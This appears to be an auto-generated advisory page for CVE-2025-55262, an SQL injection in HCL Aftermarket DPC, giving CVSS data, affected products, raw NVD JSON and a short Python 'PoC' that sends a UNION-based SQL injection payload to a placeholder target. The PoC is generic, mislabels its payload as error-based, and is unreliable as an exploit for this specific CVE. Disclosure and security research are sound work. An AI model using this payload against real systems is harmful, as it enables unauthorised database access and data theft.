Security Vulnerability Report
中文
CVE-2025-55262 CVSS 8.3 HIGH

CVE-2025-55262

Published: 2026-03-26 14:16:08
Last Modified: 2026-03-26 20:00:29
Source: [email protected]

Description

HCL Aftermarket DPC is affected by SQL Injection which allows attacker to exploit this vulnerability to retrieve sensitive information from the database.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (所有受影响版本,具体请参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(target_url): # Construct a payload for error-based SQL injection # The payload attempts to break the SQL syntax and generate a database error payload = "1' AND 1=1 UNION SELECT NULL,@@version,NULL-- -" # Example parameter name, usually requires fuzzing to identify params = { "id": payload } try: response = requests.get(target_url, params=params, timeout=10) # Check for common SQL error messages in response if "syntax error" in response.text or "mysql_fetch" in response.text or "ORA-" in response.text: print("[+] Potential SQL Injection found at: {}".format(target_url)) print("[+] Payload: {}".format(payload)) else: print("[-] No obvious SQL error detected.") except Exception as e: print("[-] Error connecting to target: {}".format(e)) if __name__ == "__main__": # Replace with actual vulnerable endpoint url = "http://target-ip:port/vulnerable_page" check_sqli(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55262", "sourceIdentifier": "[email protected]", "published": "2026-03-26T14:16:07.863", "lastModified": "2026-03-26T20:00:28.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by SQL Injection which allows attacker to exploit this vulnerability to retrieve sensitive information from the database."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por inyección SQL, lo que permite al atacante explotar esta vulnerabilidad para recuperar información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.